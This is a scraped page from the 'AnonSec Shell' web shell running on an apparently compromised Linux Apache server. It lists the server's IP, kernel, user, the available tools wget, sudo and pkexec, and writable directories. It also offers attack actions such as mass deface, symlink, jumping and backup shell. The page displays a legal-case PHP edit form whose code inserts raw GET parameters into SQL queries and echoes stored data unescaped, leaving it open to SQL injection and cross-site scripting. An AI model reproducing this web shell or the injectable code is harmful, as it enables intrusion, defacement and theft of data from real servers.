AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/juridico/pacajus/horizonte/modulos/processos/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/juridico/pacajus/horizonte/modulos/processos/andamento_edt.php
<?php
    $id    = $_GET['id'];
    $idend = $_GET['idend'];
    //$conn  = conexao::getInstance();
    $proce = $conn->query("select * from processos WHERE codigo='$id'");
    $d     = $proce->fetch(PDO::FETCH_OBJ);
    //ABAS
    $andamento = $conn->query("select * from andamentos where cod_proc='$id' and codigo='$idend'");
    $a         = $andamento->fetch(PDO::FETCH_OBJ);
    $status    = $conn->query("select * from situacao");
?>
<script src="js/mascara.js" type="text/javascript"></script>
<div class="panel panel-primary active" style="font-size: 17px;" align="center">
    Andamento | Edição
</div>
<div>
    <form id="form2" name="form2" OnSubmit="showCarga()" id="frm_andamento" method="post" action="?page=processos/info_crud&var=andamento_edt">
        <a name="anda">
            <input type='hidden' name='codigo' value="<?php echo $a->codigo ?>"/>
            <input type='hidden' name='cod_proc' value="<?php echo $a->cod_proc ?>"/>
            <input type='hidden' name='enviado' value="1"/>
            <input type='hidden' name='enviar_email' value="1"/>
            <input type='hidden' name='aviso' id='aviso' value="NI"/>

            <div class='col-xs-6 col-sm-6 col-md-6 col-lg-6'>
                <label for='data'>data</label>
                <input type='date' onkeyup="formataData(this,event)" class='form-control' name='data' id='data' value="<?php echo $a->data ?>"/></div>
            <div class='col-xs-6 col-sm-6 col-md-6 col-lg-6'>
                <label for='hora'>hora</label>
                <input type='text' class='form-control' name='hora' id='hora' onkeyup="formataHora(this,event)" value="<?php echo $a->hora ?>"/></div>
            <div class='col-xs-12 col-sm-5 col-md-5 col-lg-5'>
                <label for='andamento'>andamento</label>
                <input type='text' class='form-control' name='andamento' id='andamento' value="<?php echo $a->andamento ?>"/></div>
            <div class='col-xs-7 col-sm-7 col-md-7 col-lg-7'>
                <label for='obs'>Observações</label>
                <textarea class='form-control' name='obs' id='obs' cols='1' rows='2'><?php echo $a->obs ?></textarea></div>
            <div class='col-xs-3 col-sm-3 col-md-3 col-lg-3'>
                <label for='obs'>Status</label>
                <select id="status" name="status" class="form-control">
                    <option value="99">Selecione</option>
                    <?php while ($istatus = $status->fetch(PDO::FETCH_OBJ)) {
                        if ($a->status==$istatus->codigo) {
                            $selected = 'selected';
                        } else {
                            $selected = '';
                        } ?>
                        <option value="<?php echo $istatus->codigo ?>"<?php echo $selected; ?>><?php echo $istatus->situacao ?></option>
                    <?php } ?>
                </select></div>
            <div class='col-xs-2 col-sm-1 col-md-1 col-lg-1'>
                <label for='bt_novo'>&nbsp;</label>
                <br>
                <button type="submit" name="bt_novo" class="btn btn-primary form-control"><i class="glyphicon glyphicon-ok"></i></button>
            </div>
        </a>
    </form>
</div>

Anon7 - 2022
AnonSec Team